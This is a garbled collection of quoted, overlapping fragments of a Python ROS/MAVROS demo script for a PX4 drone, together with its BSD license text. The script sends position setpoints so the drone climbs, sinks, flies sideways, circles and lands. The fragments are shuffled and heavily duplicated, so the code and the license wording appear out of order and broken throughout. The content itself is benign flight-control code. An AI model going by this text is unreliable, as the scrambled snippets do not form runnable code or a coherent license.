"ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # * LIABILITY, OR",
"+ 1 rate.sleep() if (i > sides): print \"Fly home\" setpoint.set(0.0, 0.0, 10.0,",
"= threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate = self.rospy.Rate(10) #",
"ADVISED OF THE # * POSSIBILITY OF SUCH DAMAGE. # * # ****************************************************************************",
"if (i == 0 or i == sides): # Let it reach the",
"PoseStamped, self.reached) def navigate(self): rate = self.rospy.Rate(10) # 10hz msg = PoseStamped() msg.header",
"HOWEVER CAUSED # * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,",
"this list of conditions and the following disclaimer. # * 2. Redistributions in",
"set(self, x, y, z, delay=0, wait=True): self.done = False self.x = x self.y",
"self.z = z if wait: rate = rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay)",
"< 0.5 and abs(topic.pose.position.z - self.z) < 0.5: self.done = True self.done_evt.set() def",
"DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # *",
"def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint",
"5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2)",
"GOODS OR SERVICES; LOSS # * OF USE, DATA, OR PROFITS; OR BUSINESS",
"HOLDERS AND CONTRIBUTORS # * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES,",
"yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep()",
"USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # * POSSIBILITY OF",
"LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # * ANY WAY",
"rights reserved. # * Author: <NAME> <<EMAIL>> # * # * Redistribution and",
"* modification, are permitted provided that the following conditions # * are met:",
"# TODO(simon): Clean this up. self.done = False self.done_evt = threading.Event() sub =",
"NOT # * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #",
"def __init__(self, pub, rospy): self.pub = pub self.rospy = rospy self.x = 0.0",
"anonymous=True) rate = rospy.Rate(10) setpoint = Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0, 0.0, 3.0,",
"setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0,",
"* notice, this list of conditions and the following disclaimer. # * 2.",
"demo purposes we will lock yaw/heading to north. yaw_degrees = 0 # North",
"CONTRIBUTORS # * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT",
"* from std_msgs.msg import Header from std_msgs.msg import String from tf.transformations import quaternion_from_euler",
"* POSSIBILITY OF SUCH DAMAGE. # * # **************************************************************************** import rospy import thread",
"if wait: rate = rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay) def reached(self, topic):",
"from tf.transformations import quaternion_from_euler class Setpoint: def __init__(self, pub, rospy): self.pub = pub",
"the name PX4 nor the names of its contributors may be # *",
"# * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT #",
"conditions and the following disclaimer in # * the documentation and/or other materials",
"distribution. # * 3. Neither the name PX4 nor the names of its",
"<<EMAIL>> # * # * Redistribution and use in source and binary forms,",
"met: # * # * 1. Redistributions of source code must retain the",
"i = i + 1 rate.sleep() if (i > sides): print \"Fly home\"",
"the above copyright # * notice, this list of conditions and the following",
"a slow landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0,",
"2) setpoint.set(0.0, 0.0, -0.2, 2) print \"Bye!\" if __name__ == '__main__': try: setpoint_demo()",
"x, y, z, delay=0, wait=True): self.done = False self.x = x self.y =",
"wait: rate = rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay) def reached(self, topic): #print",
"and abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z - self.z) < 0.5: self.done",
"used to endorse or promote products derived from this software # * without",
"EVENT SHALL THE # * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY",
"print \"Fly in a circle\" setpoint.set(0.0, 0.0, 10.0, 3) # Climb to the",
"of conditions and the following disclaimer in # * the documentation and/or other",
"10.0, 3) # Climb to the starting height first i = 0 while",
"print \"Fly to the right\" setpoint.set(10.0, 4.0, 8.0, 5) print \"Fly to the",
"10.0, 5) print \"Sink\" setpoint.set(0.0, 0.0, 8.0, 5) print \"Fly to the right\"",
"print \"Climb\" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5) print \"Sink\" setpoint.set(0.0,",
"self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate = self.rospy.Rate(10)",
"rospy.Time.now() while 1: msg.pose.position.x = self.x msg.pose.position.y = self.y msg.pose.position.z = self.z #",
"Quaternion from math import * from mavros.srv import CommandBool from mavros.utils import *",
"code must retain the above copyright # * notice, this list of conditions",
"DISCLAIMED. IN NO EVENT SHALL THE # * COPYRIGHT OWNER OR CONTRIBUTORS BE",
"or i == sides): # Let it reach the setpoint. wait = True",
"USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED # * AND ON",
"rate = self.rospy.Rate(10) # 10hz msg = PoseStamped() msg.header = Header() msg.header.frame_id =",
"CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS",
"0.5: self.done = True self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose',",
"= 0.0 self.y = 0.0 self.z = 0.0 try: thread.start_new_thread( self.navigate, () )",
"0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0,",
"above copyright # * notice, this list of conditions and the following disclaimer.",
"IMPLIED WARRANTIES, INCLUDING, BUT NOT # * LIMITED TO, THE IMPLIED WARRANTIES OF",
"(INCLUDING, # * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;",
"up. self.done = False self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def",
"0.0 self.y = 0.0 self.z = 0.0 try: thread.start_new_thread( self.navigate, () ) except:",
"the starting height first i = 0 while not rospy.is_shutdown(): x = radius",
"OF MERCHANTABILITY AND FITNESS # * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN",
"rospy.is_shutdown(): x = radius * cos(i*2*pi/sides) + offset_x y = radius * sin(i*2*pi/sides)",
"3) # Climb to the starting height first i = 0 while not",
"**************************************************************************** # * # * Copyright (c) 2015 UAVenture AG. All rights reserved.",
"TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # * FOR A PARTICULAR",
"pub self.rospy = rospy self.x = 0.0 self.y = 0.0 self.z = 0.0",
"msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x, y, z, delay=0, wait=True): self.done",
"0.0 offset_y = 0.0 offset_z = 10.0 sides = 360 radius = 20",
"rate = rospy.Rate(10) setpoint = Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0, 0.0, 3.0, 0)",
"in a circle\" setpoint.set(0.0, 0.0, 10.0, 3) # Climb to the starting height",
"or promote products derived from this software # * without specific prior written",
"\"base_footprint\" msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x = self.x msg.pose.position.y = self.y msg.pose.position.z",
"= Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x = self.x",
"10.0, 5) break # Simulate a slow landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0,",
"All rights reserved. # * Author: <NAME> <<EMAIL>> # * # * Redistribution",
"and binary forms, with or without # * modification, are permitted provided that",
"specific prior written permission. # * # * THIS SOFTWARE IS PROVIDED BY",
"1. Redistributions of source code must retain the above copyright # * notice,",
"= self.y msg.pose.position.z = self.z # For demo purposes we will lock yaw/heading",
"False delay = 0 if (i == 0 or i == sides): #",
"* # * Redistribution and use in source and binary forms, with or",
"\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # *",
"purposes we will lock yaw/heading to north. yaw_degrees = 0 # North yaw",
"abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z",
"offset_z = 10.0 sides = 360 radius = 20 print \"Fly in a",
"5 setpoint.set(x, y, z, delay, wait) i = i + 1 rate.sleep() if",
"rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint = Setpoint(pub, rospy) print",
"COPYRIGHT HOLDERS AND CONTRIBUTORS # * \"AS IS\" AND ANY EXPRESS OR IMPLIED",
"# * the documentation and/or other materials provided with the # * distribution.",
"that the following conditions # * are met: # * # * 1.",
"= True self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate",
"break # Simulate a slow landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0,",
"or without # * modification, are permitted provided that the following conditions #",
"# * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, #",
"setpoint.set(0.0, 0.0, 10.0, 5) break # Simulate a slow landing. setpoint.set(0.0, 0.0, 8.0,",
"following conditions # * are met: # * # * 1. Redistributions of",
"delay = 0 if (i == 0 or i == sides): # Let",
"= 360 radius = 20 print \"Fly in a circle\" setpoint.set(0.0, 0.0, 10.0,",
"conditions # * are met: # * # * 1. Redistributions of source",
"time from geometry_msgs.msg import PoseStamped, Quaternion from math import * from mavros.srv import",
"LIABLE FOR ANY DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES",
"Redistribution and use in source and binary forms, with or without # *",
"PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # * COPYRIGHT OWNER",
"list of conditions and the following disclaimer in # * the documentation and/or",
"< 0.5: self.done = True self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10)",
"setpoint.set(0.0, 0.0, 10.0, 3) # Climb to the starting height first i =",
"0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0,",
"with or without # * modification, are permitted provided that the following conditions",
"LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS # * OF USE,",
"COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # * INCIDENTAL,",
"= 20 print \"Fly in a circle\" setpoint.set(0.0, 0.0, 10.0, 3) # Climb",
"FOR ANY DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,",
"provided with the # * distribution. # * 3. Neither the name PX4",
"setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0,",
"endorse or promote products derived from this software # * without specific prior",
"import rospy import thread import threading import time from geometry_msgs.msg import PoseStamped, Quaternion",
"ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # * LIMITED TO, THE",
"# * 2. Redistributions in binary form must reproduce the above copyright #",
"3. Neither the name PX4 nor the names of its contributors may be",
"import Header from std_msgs.msg import String from tf.transformations import quaternion_from_euler class Setpoint: def",
"BUT NOT # * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS",
"OR BUSINESS INTERRUPTION) HOWEVER CAUSED # * AND ON ANY THEORY OF LIABILITY,",
"self.x = 0.0 self.y = 0.0 self.z = 0.0 try: thread.start_new_thread( self.navigate, ()",
"copyright # * notice, this list of conditions and the following disclaimer in",
"= radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def",
"ts=4 sw=4 et: # # # **************************************************************************** # * # * Copyright (c)",
"the right\" setpoint.set(10.0, 4.0, 8.0, 5) print \"Fly to the left\" setpoint.set(0.0, 0.0,",
"CommandBool from mavros.utils import * from std_msgs.msg import Header from std_msgs.msg import String",
"= Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5)",
"print \"Error: Unable to start thread\" # TODO(simon): Clean this up. self.done =",
"FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # *",
"SUBSTITUTE GOODS OR SERVICES; LOSS # * OF USE, DATA, OR PROFITS; OR",
"ARE DISCLAIMED. IN NO EVENT SHALL THE # * COPYRIGHT OWNER OR CONTRIBUTORS",
"msg = PoseStamped() msg.header = Header() msg.header.frame_id = \"base_footprint\" msg.header.stamp = rospy.Time.now() while",
"1: msg.pose.position.x = self.x msg.pose.position.y = self.y msg.pose.position.z = self.z # For demo",
"5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2)",
"z, delay, wait) i = i + 1 rate.sleep() if (i > sides):",
"# * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # *",
"TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS # * OF USE, DATA,",
"topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x - self.x) < 0.5",
"import CommandBool from mavros.utils import * from std_msgs.msg import Header from std_msgs.msg import",
"form must reproduce the above copyright # * notice, this list of conditions",
"permitted provided that the following conditions # * are met: # * #",
"= 0 # North yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation",
"sides): print \"Fly home\" setpoint.set(0.0, 0.0, 10.0, 5) break # Simulate a slow",
"setpoint.set(x, y, z, delay, wait) i = i + 1 rate.sleep() if (i",
"3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5) print \"Sink\" setpoint.set(0.0, 0.0, 8.0, 5) print",
"# * are met: # * # * 1. Redistributions of source code",
"AND CONTRIBUTORS # * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,",
"BE LIABLE FOR ANY DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL",
"8.0, 5) offset_x = 0.0 offset_y = 0.0 offset_z = 10.0 sides =",
"BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # * \"AS IS\" AND ANY EXPRESS",
"2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2)",
"= rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate = self.rospy.Rate(10) # 10hz msg =",
"source and binary forms, with or without # * modification, are permitted provided",
"LIABILITY, WHETHER IN CONTRACT, STRICT # * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR",
"be # * used to endorse or promote products derived from this software",
"modification, are permitted provided that the following conditions # * are met: #",
"THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # * FOR A PARTICULAR PURPOSE",
"WARRANTIES, INCLUDING, BUT NOT # * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY",
"0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2) print \"Bye!\"",
"INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT",
"geometry_msgs.msg import PoseStamped, Quaternion from math import * from mavros.srv import CommandBool from",
"abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z - self.z) < 0.5: self.done =",
"name PX4 nor the names of its contributors may be # * used",
"DAMAGES (INCLUDING, # * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR",
"promote products derived from this software # * without specific prior written permission.",
"MERCHANTABILITY AND FITNESS # * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO",
"from std_msgs.msg import String from tf.transformations import quaternion_from_euler class Setpoint: def __init__(self, pub,",
"THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # * POSSIBILITY",
"import String from tf.transformations import quaternion_from_euler class Setpoint: def __init__(self, pub, rospy): self.pub",
"rate = rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay) def reached(self, topic): #print topic.pose.position.z,",
"conditions and the following disclaimer. # * 2. Redistributions in binary form must",
"radius = 20 print \"Fly in a circle\" setpoint.set(0.0, 0.0, 10.0, 3) #",
"to endorse or promote products derived from this software # * without specific",
"setpoint.set(0.0, 0.0, 10.0, 5) print \"Sink\" setpoint.set(0.0, 0.0, 8.0, 5) print \"Fly to",
"== 0 or i == sides): # Let it reach the setpoint. wait",
"while not rospy.is_shutdown(): x = radius * cos(i*2*pi/sides) + offset_x y = radius",
"SHALL THE # * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,",
"PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS # * OF USE, DATA, OR",
"= rospy self.x = 0.0 self.y = 0.0 self.z = 0.0 try: thread.start_new_thread(",
"above copyright # * notice, this list of conditions and the following disclaimer",
"prior written permission. # * # * THIS SOFTWARE IS PROVIDED BY THE",
"# * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS #",
"# * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF",
"# Simulate a slow landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5)",
"rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate = self.rospy.Rate(10) # 10hz msg = PoseStamped()",
"materials provided with the # * distribution. # * 3. Neither the name",
"* # * 1. Redistributions of source code must retain the above copyright",
"4.0, 8.0, 5) print \"Fly to the left\" setpoint.set(0.0, 0.0, 8.0, 5) offset_x",
"DAMAGE. # * # **************************************************************************** import rospy import thread import threading import time",
"# # # **************************************************************************** # * # * Copyright (c) 2015 UAVenture AG.",
"starting height first i = 0 while not rospy.is_shutdown(): x = radius *",
"OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY,",
"# **************************************************************************** import rospy import thread import threading import time from geometry_msgs.msg import",
"from mavros.srv import CommandBool from mavros.utils import * from std_msgs.msg import Header from",
"self.y) < 0.5 and abs(topic.pose.position.z - self.z) < 0.5: self.done = True self.done_evt.set()",
"8.0, 5) print \"Fly to the right\" setpoint.set(10.0, 4.0, 8.0, 5) print \"Fly",
"setpoint = Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0,",
"\"Climb\" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5) print \"Sink\" setpoint.set(0.0, 0.0,",
"10.0 sides = 360 radius = 20 print \"Fly in a circle\" setpoint.set(0.0,",
"must retain the above copyright # * notice, this list of conditions and",
"CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY, OR",
"first i = 0 while not rospy.is_shutdown(): x = radius * cos(i*2*pi/sides) +",
"in # * the documentation and/or other materials provided with the # *",
"without specific prior written permission. # * # * THIS SOFTWARE IS PROVIDED",
"5) offset_x = 0.0 offset_y = 0.0 offset_z = 10.0 sides = 360",
"y, z, delay, wait) i = i + 1 rate.sleep() if (i >",
"notice, this list of conditions and the following disclaimer. # * 2. Redistributions",
"# * 1. Redistributions of source code must retain the above copyright #",
"0 # North yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation =",
"Unable to start thread\" # TODO(simon): Clean this up. self.done = False self.done_evt",
"setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2) print",
"= rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint = Setpoint(pub, rospy)",
"\"Fly in a circle\" setpoint.set(0.0, 0.0, 10.0, 3) # Climb to the starting",
"sides): # Let it reach the setpoint. wait = True delay = 5",
"= self.z # For demo purposes we will lock yaw/heading to north. yaw_degrees",
"8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0,",
"def reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x - self.x)",
"sides = 360 radius = 20 print \"Fly in a circle\" setpoint.set(0.0, 0.0,",
"math import * from mavros.srv import CommandBool from mavros.utils import * from std_msgs.msg",
"TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # * ANY WAY OUT OF",
"<NAME> <<EMAIL>> # * # * Redistribution and use in source and binary",
"String from tf.transformations import quaternion_from_euler class Setpoint: def __init__(self, pub, rospy): self.pub =",
"TODO(simon): Clean this up. self.done = False self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local',",
"PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint = Setpoint(pub, rospy) print \"Climb\"",
"left\" setpoint.set(0.0, 0.0, 8.0, 5) offset_x = 0.0 offset_y = 0.0 offset_z =",
"pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint = Setpoint(pub,",
"20 print \"Fly in a circle\" setpoint.set(0.0, 0.0, 10.0, 3) # Climb to",
"sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate = self.rospy.Rate(10) # 10hz msg",
"OF THIS SOFTWARE, EVEN IF ADVISED OF THE # * POSSIBILITY OF SUCH",
"# vim:set ts=4 sw=4 et: # # # **************************************************************************** # * # *",
"# For demo purposes we will lock yaw/heading to north. yaw_degrees = 0",
"delay, wait) i = i + 1 rate.sleep() if (i > sides): print",
"ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF",
"IN CONTRACT, STRICT # * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING",
"* # * Copyright (c) 2015 UAVenture AG. All rights reserved. # *",
"retain the above copyright # * notice, this list of conditions and the",
"* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT NOT LIMITED",
"= True delay = 5 setpoint.set(x, y, z, delay, wait) i = i",
"self.x msg.pose.position.y = self.y msg.pose.position.z = self.z # For demo purposes we will",
"msg.header.frame_id = \"base_footprint\" msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x = self.x msg.pose.position.y =",
"# Let it reach the setpoint. wait = True delay = 5 setpoint.set(x,",
"# * # * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND",
"5) print \"Fly to the right\" setpoint.set(10.0, 4.0, 8.0, 5) print \"Fly to",
"Copyright (c) 2015 UAVenture AG. All rights reserved. # * Author: <NAME> <<EMAIL>>",
"rate.sleep() def set(self, x, y, z, delay=0, wait=True): self.done = False self.x =",
"disclaimer in # * the documentation and/or other materials provided with the #",
"OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED # * AND",
"AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # * LIABILITY,",
"self.done = True self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True)",
"Author: <NAME> <<EMAIL>> # * # * Redistribution and use in source and",
"\"Error: Unable to start thread\" # TODO(simon): Clean this up. self.done = False",
"wait) i = i + 1 rate.sleep() if (i > sides): print \"Fly",
"the names of its contributors may be # * used to endorse or",
"POSSIBILITY OF SUCH DAMAGE. # * # **************************************************************************** import rospy import thread import",
"False self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate =",
"rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint = Setpoint(pub, rospy) print \"Climb\" setpoint.set(0.0, 0.0,",
"+ offset_y z = offset_z wait = False delay = 0 if (i",
"Simulate a slow landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0,",
"= 10.0 sides = 360 radius = 20 print \"Fly in a circle\"",
"other materials provided with the # * distribution. # * 3. Neither the",
"#!/usr/bin/env python # vim:set ts=4 sw=4 et: # # # **************************************************************************** # *",
"class Setpoint: def __init__(self, pub, rospy): self.pub = pub self.rospy = rospy self.x",
"-0.2, 2) print \"Bye!\" if __name__ == '__main__': try: setpoint_demo() except rospy.ROSInterruptException: pass",
"# # **************************************************************************** # * # * Copyright (c) 2015 UAVenture AG. All",
"OF SUBSTITUTE GOODS OR SERVICES; LOSS # * OF USE, DATA, OR PROFITS;",
"quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x,",
"0) setpoint.set(0.0, 0.0, 10.0, 5) print \"Sink\" setpoint.set(0.0, 0.0, 8.0, 5) print \"Fly",
"print \"Fly home\" setpoint.set(0.0, 0.0, 10.0, 5) break # Simulate a slow landing.",
"y, z, delay=0, wait=True): self.done = False self.x = x self.y = y",
"# * notice, this list of conditions and the following disclaimer. # *",
"# * notice, this list of conditions and the following disclaimer in #",
"(i > sides): print \"Fly home\" setpoint.set(0.0, 0.0, 10.0, 5) break # Simulate",
"0.5 and abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z - self.z) < 0.5:",
"# * modification, are permitted provided that the following conditions # * are",
"msg.pose.position.y = self.y msg.pose.position.z = self.z # For demo purposes we will lock",
"# * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE",
"i == sides): # Let it reach the setpoint. wait = True delay",
"the setpoint. wait = True delay = 5 setpoint.set(x, y, z, delay, wait)",
"LOSS # * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED",
"A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # * COPYRIGHT",
"thread\" # TODO(simon): Clean this up. self.done = False self.done_evt = threading.Event() sub",
"PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED # * AND ON ANY THEORY OF",
"setpoint.set(0.0, 0.0, 8.0, 5) offset_x = 0.0 offset_y = 0.0 offset_z = 10.0",
"vim:set ts=4 sw=4 et: # # # **************************************************************************** # * # * Copyright",
"reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x - self.x) <",
"0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2) print \"Bye!\" if __name__ == '__main__':",
"the following conditions # * are met: # * # * 1. Redistributions",
"Setpoint: def __init__(self, pub, rospy): self.pub = pub self.rospy = rospy self.x =",
"SERVICES; LOSS # * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER",
"self.z = 0.0 try: thread.start_new_thread( self.navigate, () ) except: print \"Error: Unable to",
"self.y msg.pose.position.z = self.z # For demo purposes we will lock yaw/heading to",
"UAVenture AG. All rights reserved. # * Author: <NAME> <<EMAIL>> # * #",
"notice, this list of conditions and the following disclaimer in # * the",
"std_msgs.msg import String from tf.transformations import quaternion_from_euler class Setpoint: def __init__(self, pub, rospy):",
"to north. yaw_degrees = 0 # North yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0,",
"(c) 2015 UAVenture AG. All rights reserved. # * Author: <NAME> <<EMAIL>> #",
"rospy) print \"Climb\" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5) print \"Sink\"",
"ARISING IN # * ANY WAY OUT OF THE USE OF THIS SOFTWARE,",
"= 0.0 self.z = 0.0 try: thread.start_new_thread( self.navigate, () ) except: print \"Error:",
"#print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x - self.x) < 0.5 and",
"Clean this up. self.done = False self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped,",
"# Climb to the starting height first i = 0 while not rospy.is_shutdown():",
"self.z) < 0.5: self.done = True self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped,",
"the documentation and/or other materials provided with the # * distribution. # *",
"INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT NOT LIMITED TO,",
"following disclaimer. # * 2. Redistributions in binary form must reproduce the above",
